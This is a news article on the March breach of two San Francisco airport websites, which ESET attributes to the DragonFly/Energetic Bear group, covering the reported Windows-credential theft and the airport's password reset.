A breach of the the two websites operated by the San Francisco International Airport may be the work of a hacker group known as Energetic Bear or DragonFly, cybersecurity firm ESET claims.
The hack of the SFOConnect.com and SFOConstruction.com websites took place in March this year. According to a data breach notification released by the airport’s officials, the attackers planted a malicious code on the breached websites designed to steal “some user’s login credentials”.
“Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO,” the alert said.
The malicious code has already been removed from the affected websites. The airport has also forced a reset of all SFO related email and network passwords.
While some reports suggested the involvement of Magecart gangs in the attacks, the ESET researchers say that this breach has no link with any Magecart credential stealer.
Magecart is an umbrella term for malicious hacker groups who target online shopping websites to steal customer payment card information.
“The targeted information was NOT the visitor's credentials to the compromised websites, but rather the visitor's own Windows credentials”, ESET said in a tweet.
According to the firm, the recent hack of SFO airport’s websites is in line with the TTPs of the DragonFly/Energetic Bear APT group.
“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” the researchers claim.
The DragonFly/Energetic Bear group has been active since at least 2010 and initially targeted organizations in the energy and industrial sectors primarily located in the Middle East, Turkey, and the US. However, in 2018 Kaspersky Lab reported that the hackers expanded their target list to include other types of organizations as well, such as companies in the aerospace and the aviation sector, software development, and banking industry.